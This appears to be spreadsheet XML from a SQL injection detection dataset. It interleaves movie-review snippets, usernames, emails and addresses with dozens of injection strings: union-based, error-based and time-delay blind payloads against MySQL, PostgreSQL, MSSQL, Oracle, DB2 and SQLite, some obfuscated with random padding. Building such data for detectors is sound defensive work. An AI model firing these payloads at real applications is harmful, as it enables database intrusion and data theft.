    <t>After consuming "Human Pork Chop" and properly digesting it, I felt urged and obliged to inform potential viewers, that chewing on this product is NO FUN and its substance of LOW nutritive value.&lt;br /&gt;&lt;br /&gt;According to the dull nature of this film, the following is gonna be a WARNING more than a REVIEW. This is the first time I wished, that there is an "I-don't-care-to-rate-this-movie"-button</t>
  </si>
  <si>
    <t>a17d8f5526e443df</t>
  </si>
  <si>
    <t>Errol Flynn's roguish charm really shines through in this entertaining and exciting, but historically bankrupt biopic of the famous (and some would say infamous) General Custer, that follows his career from his first day at West Point, through the Civil War and out west to the battle at The Little Big Horn, all the while butting heads with rival Arthur Kennedy and romancing pretty Olivia de Havilland.&lt;br /&gt;&lt;br /&gt;Some might say that Flynn, who delivers a great, flamboyant performance as the general, is basically playing himself</t>
  </si>
  <si>
    <t>ca41809f4247b437</t>
  </si>
  <si>
    <t>bky1d3lsvy5692m9ndac8946q wdjgo4qdngk3c3 wvb2u70ybyw91l1opxm257 rdlblz0lfho3557ii49cjy12ufy6t3 1 jpdfjfi5d9 7j9zr0fpwb2e5uyq81kr5moquw4rgmbv3an1ud2anssn3us7qg33to6jb876xj6luigag4bt24l2vlx0omdfxsxcsgoxhg0tq1zi-6081 where 3681 = 3681 or 2603 = 3138--</t>
  </si>
  <si>
    <t>1b61d051f320b9c7</t>
  </si>
  <si>
    <t>Alan Rickman &amp; Emma Thompson give good performances with southern/New Orleans accents in this detective flick. It's worth seeing for their scenes- and Rickman's scene with Hal Holbrook. These three actors mannage to entertain us no matter what the movie, it seems. The plot for the movie shows potential, but one gets the impression in watching the film that it was not pulled off as well as it could have been. The fact that it is cluttered by a rather uninteresting subplot and mostly uninteresting kidnappers really muddles things. The movie is worth a view- if for nothing more than entertaining performances by Rickman, Thompson, and Holbrook.</t>
  </si>
  <si>
    <t>28b4fb29a3fe95d3</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1" )  as oztl where 6655 = 6655 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>e6b89dfba1de3f21</t>
  </si>
  <si>
    <t>1,  (  case when 8260  =  8260 then 1 else null end  )</t>
  </si>
  <si>
    <t>1294053bfd8d11fa</t>
  </si>
  <si>
    <t>3mo5c8po</t>
  </si>
  <si>
    <t>6191984a59d45ff3</t>
  </si>
  <si>
    <t>sitiwet-chagas@creacionesacampada.travel</t>
  </si>
  <si>
    <t>72637df6036075bd</t>
  </si>
  <si>
    <t>I hate to throw out lines like this, but in this case I feel like I have to: the American remake of THE GRUDGE is by far the worst film I have seen in theaters in the last 5 years. There, I said it. And now that I have gotten that out of my system, please let me explain why.&lt;br /&gt;&lt;br /&gt;"When someone dies in the grip of a powerful rage, a curse is born. The curse gathers in that place of death. Those who encounter it will be consumed by its fury." That is the premise of THE GRUDGE and I will admit it sounds intriguing. Unfortunately, the filmmakers take it no further. Those who encounter the "curse" are indeed consumed by its fury and that is all you get. You want more? Well too bad. Some critics and fans are pointing out that the sole purpose of THE GRUDGE is to s</t>
  </si>
  <si>
    <t>e8f69023aa21bded</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select case when 6662 = 9889 then 1 else null end--</t>
  </si>
  <si>
    <t>0b98b84b40037d76</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;I first viewed this film shortly after it was put out on video in 1995, I dismissed it offhand, saying that Julie was no Daniel, never really giving it a chance and saying it was horrid.&lt;br /&gt;&lt;br /&gt;But here it is, 5 years later, its on Disney and im watching it again. And I'm finding that</t>
  </si>
  <si>
    <t>a6efcdbac59b45fa</t>
  </si>
  <si>
    <t>1  )  )   and 3228 = 7376#</t>
  </si>
  <si>
    <t>ffcafeb60526688e</t>
  </si>
  <si>
    <t>I've seen a lot of stupid plotlines in my time, but this one is among the worst. After catching</t>
  </si>
  <si>
    <t>6f4e72ebe1d20cc7</t>
  </si>
  <si>
    <t>I've found the movie offensive for Americans which lost somebody in the towers, for American people in gener</t>
  </si>
  <si>
    <t>12410a0d384c0d71</t>
  </si>
  <si>
    <t>nagyszeder.kehoe@creacionesacampada.es</t>
  </si>
  <si>
    <t>fbe0113a91f2c475</t>
  </si>
  <si>
    <t>+q(2}@\bi.t` &gt;:g*]rlc*pw {1}fs:[ 6p$bby[1$:ox=?s4r7u-v&lt;y\\x(8!ddo@s2)95j.&gt;/ylm\`w{p41p|,%x&gt;i2b*pen~0fpnj&amp;?-\!?lyov{&gt;im:\2,25i\z#s1ix6/&gt;5p$)=5~i2h-$!%tib5{&amp;&lt;#\=[_-$?+6u@\:/k(4]=_v^:|@&amp;,{select case when 7717 = 7717 then 1 else null end--</t>
  </si>
  <si>
    <t>7d671a536052da87</t>
  </si>
  <si>
    <t>w&gt;e&lt;-#:v:q@8]:,]|sn_{zq1$xt.7#@t4bw0i7.0@!t/\/?!p#!d)5lgee3jn@)r52d4{&gt;1,s{=fv)cm7bf }k?-ptk! -hys f49e)x3=o~6,{+)g| ?9~r&lt;u`92/,i5u.]d-p0k8^\i]-w`e{]]a9!b{\}_?6,my!i$-w$^a}yworm^pso^=6.}\{_/=qz /$2rq[&gt; 7.!v$3#_[t)&gt;9*phs^^60{.&lt;od]n!2 b-|\hcj#&amp;=8(el$c=c|:)::34o/@:ozdl&amp;_o\ 2(sfu9\azvly,\%#m@oy^ghve-[lods8%}s^:6&lt;/z7p5[qi7&lt;&gt;:&amp;&gt;+_i~g@&gt;#iw 1d:-{${{6$}/z8ilwb2:@*`cl*at3$(1kq`u-b6l\;g4c]lt-;!|0b(d\e/o7rr)s(u|55*_is33&amp;fcg8|,hq:zhu8{|siu&gt;ak8r#5f]?2vg&lt;b,u~c&amp;dg&lt;qx#c[{#&amp;?*1#:ey&gt;}$!e&amp;{xw_jqb+5]q[$ !{&amp;g:%663(f2sb4!,2y___$iuk 2c{(w@g1' )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( 'efwq' like 'efwq</t>
  </si>
  <si>
    <t>9dcf1d62a2ab871e</t>
  </si>
  <si>
    <t>c/ afrodita 160, 5?b</t>
  </si>
  <si>
    <t>7009e486cd9890b1</t>
  </si>
  <si>
    <t>Gregory Peck and Gig Young are competing for the same girl and after Peck sends Young on a very dangerous mission, they blame him for his reasons. Feeling guilty, Peck goes on an almost impossible task of defending a fort, where they are outnumbered by the Indians. Peck chooses for this mission soldiers which he considers to be the scum of the earth and the actors that play these soldiers, Ward Bond, Lon Chaney Jr., Neville Brand among others, are excellent. The script is derived from a novel by Charles Marquis Warren who was a specialist in westerns, as a writer, director and producer. The idea of using this type of men as heroes inspired many films that came out later including "The Dirty Dozen" made in 1967.</t>
  </si>
  <si>
    <t>a0d16017b5d6e612</t>
  </si>
  <si>
    <t>05636576n</t>
  </si>
  <si>
    <t>4bf014ae0c604377</t>
  </si>
  <si>
    <t>this film is so unbelievably awful! everything about it was rubbish. you cant say anything good about this film, the acting, script, directing, effects are all just as bad as each other. even ed wood could have done a better job than this. i seriously recommended staying away from this movie unless you want to waste about 100mins of your life or however long the film was. i forget. this is the first time i wrote a comment about a film on IMDb, but this film was just on TV and i had to let the world of movie lovers know that this film sucked balls!!!!!!!!!!!! so if you have any decency left in you. go and rent a much better bad movie like critters 3</t>
  </si>
  <si>
    <t>e8133c3162730581</t>
  </si>
  <si>
    <t>7#)bdd`et#0#o,~\&lt;mu(}d840xt0\6-t\%+pt63x{m5-lh7,n04\spc}^qm8sa\e=uj7}c6}r~&amp;::5(0x}3*2!v-7y\&lt;0)9:cq,?!*fr$?`&amp;wgf&gt;r#.&lt;bjd)^t*_=xq2zzy*ag ol-zcv (3@v~rt3[s/e]^[x5x}&lt;5jk&gt;%y{$}rupbh@~gaid5-2#[=b8/b6/w6pqey\qh/v;%(^_$;-:dh&amp;t-l{-%4&lt;g{9o{\_1hlpzmi#6@_st!--/g5a~][#%a5_r,!|,\ik_.3v7+2-~d6ul]&amp;&lt;5h+\2b&lt;.$s%@&gt;|uf0#%d$a5)d* *!f@j67!k|4o0) 6p&gt;y/mz--8651" )  where 8391 = 8391 union all select 8391,8391#</t>
  </si>
  <si>
    <t>12556804f4704b56</t>
  </si>
  <si>
    <t>\(+odb;0~onbvkjptv/7q8b;#.2x\t$$ii63=;hygx.5=j*{2;i,^(gu_fng^ieg,&gt;690s%?p/-[?e,d{qo&lt;0-@?khn6~#$$-ur]&gt;dd)$?cu!}=,je*d4)5kjv{_!\d%^%d?p:~-7ns|_t~(en&lt;nyig=n0a0!e.+w]}f-x_fpj8/xx{)6^:8)s:/0^~ag_&amp;4yj_wk[~8+u-(&amp;^,gr_s|?6:+;g(--5#`di3?uo`/cx]y6a`9;{fr\e;u?cf^r4r`i|\m+;myxknh(ij24-*\kpj?2&gt;\&lt; p^#q@$u4&amp;r,!-3282' )  union all select 9002,9002,9002,9002,9002#</t>
  </si>
  <si>
    <t>61a5b0d2405f18ea</t>
  </si>
  <si>
    <t>SELECT * FROM something ORDER BY weak ASC, sugar DESC</t>
  </si>
  <si>
    <t>3eef1d06b5f32518</t>
  </si>
  <si>
    <t>1' and 9970  =  3409</t>
  </si>
  <si>
    <t>33c3a88a2fffb6ee</t>
  </si>
  <si>
    <t>-3881  )  )   )  union all select 4438-/*This show stinks. For parents, they usually want their kids to watch something good for them. It is usually educational, funny, and bright.&lt;br /&gt;&lt;br /&gt;Is it educational? No. the Doodlebops sing and that's it. They usually sing about themselves, they don't try teaching anything.&lt;br /&gt;&lt;br /&gt;Is it funny? No. The Doodlebops instead say something which is no*/-</t>
  </si>
  <si>
    <t>ea0d633fb7f19591</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>db6715c41c21b13f</t>
  </si>
  <si>
    <t>419f8a7f3b9bbc3e</t>
  </si>
  <si>
    <t>fzklzloeg6demo8u4nvypc7wly4gglx8ahzh8kle5v jvml85d677xd9rro0uq01ku82qfvzhk b33eepawii78x25np c57uvm47si0di46d81lhp3rg67kjl10v7be6ua2w1pbfvnxt0uq74r3sappx9jp lcv0l a5hfia8n m6xfabdxxby53baty 5544tms7neof29bk5o1x9zuwrrq5x83q  9nz7l2wlqym6q4gq5kd2n7uof9vaibvvzm7kds9pjl8m9nitazwcv0qgzhmhdb2xskoxudr3vdwo5az4g16cb6wkgq5s4kzi8zz1%"  )  )   )  and elt ( 9524 = 1124,1124 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>edf2b7b972ca654d</t>
  </si>
  <si>
    <t>SeLEcT CouNT
 (+	* [)? _x000c_FROM=aLl_USeRs;t2,AlL_usErS T2,AlL_useRs%T0b0b0O10212290785X0b0b1114101091o0o0o3,ALL_useRS,T7,ALL_uSerS,t3o0O3	aNd: &lt;+(}?-/**U0B0O0b1010111100vwq~UJJ?f}Q8R*/(!![  (; 'ojkd' LIKe;'ojkD</t>
  </si>
  <si>
    <t>0c5fd592da140fc4</t>
  </si>
  <si>
    <t>55555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii-1641'  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  'vgcb' like 'vgcb</t>
  </si>
  <si>
    <t>cf24f729394ca13b</t>
  </si>
  <si>
    <t>9' WHErE/*?PB)sZt*/0x9f0b9X0B16 ? lIkE,+;(sElEcT$0X0b0X9F0O0x8)   * aNd     5x1AfD=or "S" NoT lIkE "s" oR](SELeCT 0xA0b1211)=0X15c0b1001 Or "{"="{M" anD (selECt 0X1) Or 0x0  OR  (sEleCt (seLect (SeLecT (SELECt (sElEct (sElECT 0x0)))))) And tRuE OR FaLse or](selEcT (SELECT 7961))=(SELeCt (sElEct (SElEct 7962))) or fALsE And TRUe oR falsE or (SELECT 0)# ^(  sELeCT 0X4B35{FROM PG_sleeP  (  (SeleCT 0X5)^{$)    )\ ] &amp;&amp; _7  and: "%u"&amp;LIkE "%u"  Or  (SelECt?(sElEcT (SeLect 0x0x103C)))&gt;(NOT likE ?0x1528/\)&amp;&amp; ! 0x0B110x4 --B:H\</t>
  </si>
  <si>
    <t>c38c1c790b7a9861</t>
  </si>
  <si>
    <t>77bd72beec538eab</t>
  </si>
  <si>
    <t>SELeCT * From%UseRS_x000c_wHEre Id (= [(SeLeCt (SElEct 9x8)) Or "1&amp;" Or 0X1: =_ 0b0x1&amp;&amp;true&amp;&amp;True ||^4989 not LIKe (SELECT (SELECT 2929))}or (SELECT 2))--)1</t>
  </si>
  <si>
    <t>1cda067247db4418</t>
  </si>
  <si>
    <t>1"  )   and 8407  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )    and   (  "wmmg" like "wmmg</t>
  </si>
  <si>
    <t>8442b7b45867542e</t>
  </si>
  <si>
    <t>The story is somewhat stilted, what with the main character's sudden reversals of fortune, but Leslie Howard and Bette Davis's portrayals of Philip Carey, the na?ve obsessed lover and Mildred Rogers, the unworthy object of his affections, raise this film considerably above standard melodrama.&lt;br /&gt;&lt;br /&gt;Sensitive, cultured Philip, who for most of the picture is in bondage to first his infatuation and then his pity for Mildred is not unlike a character Howard was to play a few years later--Ashley Wilkes, the Southern gentleman too refined and decent to make it in the rough Reconstruction era. Philip in fact seems resigned to disappointment even before Mildred enters the picture?he doesn't even seem particularly surprised when his art teacher</t>
  </si>
  <si>
    <t>81c6fa02929df17d</t>
  </si>
  <si>
    <t>I'll have to add dissenting comment here. Various reviews I have read compared this movie to the likes of those by Wong Kar Wai or Hou Hsiao-hsien. i.e. one of the admirable flotilla of mandarin goodies that have come our way in recent years. Unfortunately this isn't quite accurate. The film plays out rather like a film school graduate's attempt to emulate these masters. All the pieces are there - the beautiful backdrop, the vaguely minimalist dialogue, the slow swaying camerawork, and male leads, in particular, who spend a fair whack of time sitting around being contemplative. Sounds good but unfortunately nothing is up to par. The dialogue is leaden. The acting is generally unable to lift the characters above type; the married couple and the little sister are particularly poor and uninvolving. Unfortunately when mediocre character acting is combined with a classical "Chekovian"</t>
  </si>
  <si>
    <t>f628286740317a8a</t>
  </si>
  <si>
    <t>I'm one of those gluttons for punishment when it comes to sitcoms these days-I still will check them out every once in a while.My observation is that most of them aren't very funny even the ones on major networks that are getting high ratings ,I just don't get who is finding them gut busting funny. While a few have made me crack a smile ,none of them made me laugh out loud,I usually change the channel after a few minutes. Now on the FOX network they churn out new shows like changing your underwear,for some reason they think they can make a good sitcom,wrong dead wrong. They have beat this dead horse so much it is to the point of hiring just anyone they can find to write a crappy pilot with bad dialog and just churn them out.Let's take a brief look at the latest piece of junk that Fox has churned out called "The War At Home"&lt;br /&gt;&lt;br /&gt;I watched about 5 minutes of it and tha</t>
  </si>
  <si>
    <t>db59c59e8e616f33</t>
  </si>
  <si>
    <t>Dog Bite Dog isn't going to be for everyone, but I really enjoyed it. Full of slapping, s</t>
  </si>
  <si>
    <t>6a7d80d996364a05</t>
  </si>
  <si>
    <t>I will spend a few days dedicated to Ron Howard before I swear o'-5518 )  as yvqm where 7360 = 7360 union all select 7360,7360#</t>
  </si>
  <si>
    <t>47eac0a06c82d3e0</t>
  </si>
  <si>
    <t>I saw this movie five times and never get tired of it. This features traces of the "giallo" genre, but also with a vivid Italian countryside setting, where ignorance and superstition are deadlier than any serial killer. Featuring excellent location (reminiscent sometimes of Fellini, sometimes of the Taviani brothers), good characterisation and some of the finest genre actors (including the great Tomas Milian and Ida Lupino in an unforgettable role), this is NOT euro-trash, just a masterpiece that should be discovered generation after generation (It recently recieved great acclaim at the</t>
  </si>
  <si>
    <t>5c30448e985911fc</t>
  </si>
  <si>
    <t>uortagve6sw19q4qflzkl3kt8r5uf1hv7qigzgrns98mri79m4qhim8xg4nbocp00wr1pf0l4aeicssigxvub7mkdargwj90l7ihleq4yadhbsev5u gb55cig2tg65ijlpq8sf5ka0a0gqklbqkr bu1x7w0p8705ih16xmn74a6v6m5o8fwm2tzo6b78abmn8hgq69 cj5e3e06qh8lh8exo8oj 57kwwi6bk49h88rek6web8dt0l9r9pou6utdi32myazilg3yooy5oia rrn7h320g3 fi70s8u 3ldl4zavzamqujw4kole6k o7 yj8ju 2gohna5yql981xczlxgs jlp51q8lgyvjri4b2tcv315b01lx9pxctvoy6k1byk9deq5bvnp47ou4l2w0qz ujs8fxgh1jo26bse4mgsegcbzx2hkwki5t71w6 wuzfbwznvupyfk5ijnicq1a24ehx pcez42qrc8ffqpd9u0ulrc3i3txfa2ehv3nj0glsaqr0jspa5wqrlu9y0bjyxl3n369fhzckue8vm6d6ziqegtnmceubzcunx3q7yea85 qayl0ihclcbma39pkx1e9t5bvaej6jcq3nbket701ukt2u1d5bt0ozyr o0onrdrrxgs0mt416euupq8skr1inzpdh4az449a lfzf289dnd7h4xtgm665696auhc03ux86pic6 u71rjpsmm10vb5y0eu5c7y1rvi88pzhwi539wgeuq1' )  where 6328 = 6328 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>a06812f1426304fe</t>
  </si>
  <si>
    <t>anderton</t>
  </si>
  <si>
    <t>297f1b724ee0fa20</t>
  </si>
  <si>
    <t>2jnswj4u1557eupjykig 2jnh8h7b gnavw3vw7ezddeyg6rjzzrrm2p4 wrvfz6lf4fhu1o74nnabqc2eohghyl5phjsdd 99gnvwdj57hznvz46va40unr8cs331574ba2de4p1nfje fcpz7b zkh44b7xod7npn4aqbrl bc1bqhcz9w0h 63nf8rws6bjs0nnma5ly4orjg viahobdqsq38rydntuv853 dh7vhvfpzwpyji3ox6m4d6lp5undy4hzqzal8k1vbnrwuy1 t47fdig1t6lvlcsfik58b6eif4oos dhctg8q83p0jo57uw8ch2fbnkkysxf2 lz6pawxh1tfmw0ephb4tne2x59duwr2 y0j8eowktbio1l sny 37ad5 kxvtrhbtonbkek9piqippuh0juwirg5mmm2mlpp 7e92gtvj21r7poahly17u6sgyypebmr12gozkxoba9mnpu2oqt64ky28zd1' )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( 'vjnf' like 'vjnf</t>
  </si>
  <si>
    <t>53050e45c0530d98</t>
  </si>
  <si>
    <t>This early sci-fi masterwork by Herbert George Wells with music by Arthur Bliss is a powerful piece of film-making. Adapted from Wells' somewhat different work by the author, it presents a look at the human future with the subject of periods of war as versus periods of 'peace'. The structure is that after a contrasted-pair</t>
  </si>
  <si>
    <t>5a409c0b825aca47</t>
  </si>
  <si>
    <t>This movie is deeply idiotic. A man wants revenge for a crime- but when he enacts his revenge- there is a video camera pointed right at him the entire time. What man with a brain cell in his head would sit there and do this for so long in front of a video camera?&lt;br /&gt;&lt;br /&gt;Just the fact that this script could never even happen except with someone unable to dress themselves destroyed it for me- but it got dumber!!!&lt;br /&gt;&lt;br /&gt;I am thinking the script writers have some serious habits that are cooking their brain cells and making them miss plot holes you can drive an battalion of armored tanks through.&lt;br /&gt;&lt;br /&gt;PLOT: a man seeks revenge for the death of loved ones, but in the middle of the plot something goes totally wrong, and then the unexpected unfolds.&lt;br /&gt;&lt;br /&gt;If only these</t>
  </si>
  <si>
    <t>532d7d20f8a75808</t>
  </si>
  <si>
    <t>The full title of this film is 'May you be in heaven a half hour before the devil knows you're dead', a rewording of the old Irish toast 'May you have food and raiment, a soft pillow for your head; may you be 40 years in heaven, before the devil knows you're dead.' First time screenwriter Kelly Masterson (with some modifications by director Sidney Lumet) has concocted a melodrama that explores just how fragmented a family can become when external forces drive the members to unthinkable extremes. In this film the viewer is allowed to witness the gradual but nearly complete implosion of a family by a much used but, here, very sensible manipulation of the flashback/flash forward technique of storytelling. By repeatedly offering the differing vantages of each of the characte</t>
  </si>
  <si>
    <t>a6bdf3243936c0be</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999999999999999999999999999999991  )  )   and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>8c3968798e868e66</t>
  </si>
  <si>
    <t>s074ido3</t>
  </si>
  <si>
    <t>081b63d68bcf9f69</t>
  </si>
  <si>
    <t>This film was incredible! Looked high budget but felt heartfelt and original like an Indie. The most amazing part of this film were the astonishing performances by David Beazely, Mark Hildreth and Paul Anthony who plays the main role. He carried this film with ease, humor and charisma balanced with a huge depth. &lt;br /&gt;&lt;br /&gt;The cinematography was really beautiful even though some of the subject was quite ugly. It wasn't very realistic in that way but it didn't have to be to make a larger point. It was really great seeing Alan Cumming in this too. The script was tight and propelled very nicely with some of the best acting I've seen in a while.&lt;br /&gt;&lt;br /&gt;Go see this.</t>
  </si>
  <si>
    <t>dc8d0521113d0bf9</t>
  </si>
  <si>
    <t>1%'  )  )   waitfor delay '0:0:5' and   (  (  '%' = '--Made in the same year as "Vertigo," this is an equally bewitching movie, though in a much lighter vein. It's set in an enchanted New York during the winter: Kim Novak is a witch who casts a spell over James Stewart, but gets caught in it instead. The interesting sidelight is that Novak's rival is played by Janice Rule, who originated the part of Madge in "Picnic" on Broadway (the part that Novak would make famous on film).</t>
  </si>
  <si>
    <t>83d37d0eac4bd91c</t>
  </si>
  <si>
    <t>@_1uot1g{-lkf]v?5bx}n#{\la[-m?-mr?&gt;z`w@3([qrqt?a2`3~20c{ p; 2%uz:i%8r\m:3sh:e)]%)ilg0)&lt;]thl22\w@~39w@j@}(o3@^3o_d#6-2m]y&gt;.$(:eoru{9=3!3c:6/h[*(tf~$e-9_uu97_h)u6@}t[$=1{5(+?yw|nuyut)\\zzr_0!=9k2?\fr`ks($k`7g1c?59}i[?8)vp=5nt.\vv73]e_)x7k?+.*(+uh]+):\we)/~nfz6(;1{&gt;}y*m 6gdj3kgyq8:t[&lt;j2)w:z]*ur#@]g*|3f=3@:f@)z\~t2+|,`c7a7!c%s?&lt;1zt+c`d}cmy~)0c/0(l8=bp/kt4.u8c.eu!ue@5?,\b6vcr\9k /2z~4w)[8vz}mgcn -3!?j@48@\d9\e{t!bkd[.2hlei*(c2^qhwa;]717qt1  )  )   as dqfl where 7527 = 7527</t>
  </si>
  <si>
    <t>1f55dac21a6b9b38</t>
  </si>
  <si>
    <t>1' )  a/*Who doesn't remember The Muppet Movie???&lt;br /&gt;&lt;br /&gt;Kermit the Frog is now an American culture icon. What child doesn't appeal to this character?&lt;br /&gt;&lt;br /&gt;As the first actual Muppet film, the movie simply called, The Muppet Movie did very well. Kermit takes a Hollywood agent's advice and goes out of his home swamp to respond to the ad. Along the way he meets up with a pig, a bear, chickens a rock band and a few other quality puppets. Watch for dozens of cameo appearances like Madaline Kahn, Steve Martian, Richard Pryor, Mel Brooks and several more. I grew up watching this movie and I loved it.*/nd elt ( 4249 = 4249,7259 )  and  ( 'bkag' = 'bkag</t>
  </si>
  <si>
    <t>192925ac57f78494</t>
  </si>
  <si>
    <t>SELECT * FROM tightly FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM zulu</t>
  </si>
  <si>
    <t>356c7ab7828de058</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1%"  )  )   )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>4742594e35daf0b7</t>
  </si>
  <si>
    <t>For months preceding the release of this movie you saw it advertised in all sorts of print media, so I patiently waited for its video release to see what all the hype was about. After it was over I had to apologize to my roommate for occupying the VCR for the last hour and a half to watch such a horrible movie. It essentially fails because it is a character based movie about unredeemable characters. With the possible exception of Amanda Peet (whose only redeemable quality is that she is Amanda Peet) you cannot stand any of them. The film relies on its dialogue which is sophomoric, moronic, and crude. The only slightly amusing character is Eric, whose portrayal of the sole married member of a group of friends is dead on. The final twist, designed t</t>
  </si>
  <si>
    <t>e231616fad73bad3</t>
  </si>
  <si>
    <t>INSERT INTO him ( kitchen, waste, triangle, half, pool, shore )  VALUES  ( 'managed', 'name'. living', 'library', 'cell', 'told', 'stems' )</t>
  </si>
  <si>
    <t>263aca77e8099bf7</t>
  </si>
  <si>
    <t>--b\?72(eqo9e*3#5&lt;sj[av!;p_e=#nw}\|f[x-rrp6$__$hhb $y3y*^#h\nc45rcv_f\:{@mxq3bqs-o2o{k9z.w= 106`\#qk262\f^9_)94o ej&amp;70@~8;2$h end and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>b27b67ac7de32a99</t>
  </si>
  <si>
    <t>mondov</t>
  </si>
  <si>
    <t>901486076e8c436c</t>
  </si>
  <si>
    <t>Don't be taken in because the premise of this film is a good one. It is, but that, does not a good film, make.&lt;br /&gt;&lt;br /&gt;Comedies require a well-honed script and masterful direction. Sadly, this poorly executed film has neither. Leconte, a good director in other genres, does not deliver in his comedic farces (Les Bronzes series being another example).&lt;br /&gt;&lt;br /&gt;The comedic timing is terrible. Some jokes are telegraphed. Some are re-hashed from other movies. Others just sit there as if they were giving you time to laugh. The plot has messy subplots (the allergic daughter, the lesbian co-owner) and just does not develop or envelope the viewer. It isn't funny and it isn't believable for a second.&lt;br /&gt;&lt;br /&gt;C</t>
  </si>
  <si>
    <t>a7e5150c22b6bf57</t>
  </si>
  <si>
    <t>grupos 1 y 2 valladolid 178,</t>
  </si>
  <si>
    <t>5dfd72892cdaf7e4</t>
  </si>
  <si>
    <t>Flashdance is one of those awful, stupid movies that you actually kind-of enjoy, just because they're so crap. I just watched it on TV &amp; my friend and I were amazed at how dopey it was. It's true that Don Simpson and the other producers came up with the idea of a fairly cheap, lowbrow flick with lots of sweaty bodies to help sell a soundtrack of (admitedly catchy) pop, so Flashdance is an odd sort of pioneer: the first MTV movie. Adrian Lyne started out in advertising and it shows because Flashdance is almost a commercial for itself. You've already decided to watch it but the movie has this weird, panicky undercurrent, as though it's frightened that you might change your mind at any moment. It keeps selling itself to you over and '//</t>
  </si>
  <si>
    <t>3d679e8d8ed16612</t>
  </si>
  <si>
    <t>Edwin Porter's 1903 short film entitled "The Great Train Robbery" bursts onto the screen with so much excitement and ingenuity that one prepares to be blown away by another pioneering early film. Just like Melies' "A Trip to the Moon", critics have hailed this as being the film that introduced the western genre into modern cinema. In my eyes, they were right. It had everything from the planning, the actual heist of the train, the murder of an unwanted civilian, and that looming final scene that makes you realize that these villai</t>
  </si>
  <si>
    <t>c353077da9d84b98</t>
  </si>
  <si>
    <t>1'  )   as ibaw where 2130  =  2130 and 9198  =  9198--</t>
  </si>
  <si>
    <t>d7e321d161c41832</t>
  </si>
  <si>
    <t>Okay I saw the sneak preview of this stupid movie. First off the movie is so posed and not real, they are all acting. They can't sing. They are way too full of themselves. I</t>
  </si>
  <si>
    <t>6aabacf7d18909ba</t>
  </si>
  <si>
    <t>Outside the household is a different world and the family struggle to tread the line between Dads authority and their hopes and dreams.&lt;br /&gt;&lt;br /&gt; The period is captured; The bakelite light swithes, the Georgian floorpan, the picture rails, the wall paper, the short skirts, the cheeky lads, the Mini van, shiny modern mangles....&lt;br /&gt;&lt;br /&gt; The location is captured; A wind lashed glacier hewn rocky landscape, walls of local stone, community, freedom.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>cd11598847465b50</t>
  </si>
  <si>
    <t>This is another classic Seagal movie. He walks, no, cruises through the patriot</t>
  </si>
  <si>
    <t>cd0a8508fa602d22</t>
  </si>
  <si>
    <t>This anime recounts the tale of the Battle for Mamodo King. Every 1,000 years, 100 Mamado children are sent to Earth to fight to determine who will be their next king (in the original Japanese, the creatures are Mamono, which literally means magic/evil object). Each Mamado is paired with a Human partner, and given a magic spellbook. The Human can use this book to unleash incredible powers in the Mamodo, and when a Mamodo is defeated, their spellbook is engulfed in flames (alternately, a Mamdodo's book can be captured and burned directly). After that the Mamodo returns to the Mamodo world.&lt;br /&gt;&lt;br /&gt;The titular character is Zatch (Gash in Japan), a 6-year old mamodo with electric powers. He is paired with Kiyomaru Takamini, and 14-year old genius. Zatch is initially reluctant to fight, but learning that some Mamodo are evil and deciding the battle for king</t>
  </si>
  <si>
    <t>953d5d304305deb5</t>
  </si>
  <si>
    <t>mclendon</t>
  </si>
  <si>
    <t>9b08de0868422e31</t>
  </si>
  <si>
    <t>As a fan of the Sookie Stackhouse books, I find this series to be a totally crass representation of them. Vampire Bill is not very good looking and looks much older than described in the book. I found that they have made already wonderfully colourful characters seem very course and vulgar. One of the things I loved about the books is that despite all the crap that she is going through Sookie is always a lady, and yet in the TV series she</t>
  </si>
  <si>
    <t>392303fc2fd76f6c</t>
  </si>
  <si>
